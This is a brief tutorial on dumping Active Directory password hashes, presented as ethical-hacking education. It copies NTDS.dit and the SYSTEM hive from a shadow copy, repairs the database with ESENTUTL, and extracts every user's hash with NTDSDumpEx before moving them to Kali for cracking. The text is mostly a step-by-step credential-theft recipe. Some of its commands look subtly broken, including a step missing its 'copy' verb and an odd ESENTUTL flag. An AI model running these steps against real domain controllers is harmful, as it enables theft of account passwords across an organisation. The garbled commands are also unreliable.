Ethical Hacking 4: Cracking Active Directory User Password

Disclaimer: This article is suitable for intermediate and expert users and only for education.

  1. copy NTDS database using the following command: copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit  c:\Extract\ntds.dit
  2. copy SYS using the following command: reg SAVE HKLM\SYSTEM c:\Extract\SYS
  3. Copy System using the following command: \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SYSTEM c:\Extract\SYSTEM
  4. Gain the decrypted password using the following command: NTDSDumpEx.exe -d C:\Extract\ntds.dit -s C:\Extract\SYSTEM

Note: The process failed, and the error indicates that the database needs to be repaired.

5. Repair NTDS using the following command: ESENTUTL /p C:\Extract\ntds.dit /!10240/08 /o

6. Re-execute the following command: NTDSDumpEx.exe -d C:\Extract\ntds.dit -s C:\Extract\SYSTEM

  1. All users and hash passwords are listed.
  2. Three users (Administrator, far and mike) share the same hash, which indicates that the users utilize the same password. This loophole gives the hacker a clue that all users will utilize the same password.
  3. Copy the hash value into Notepad, save it as .txt, and transfer it to the Kali Linux Virtual Machine.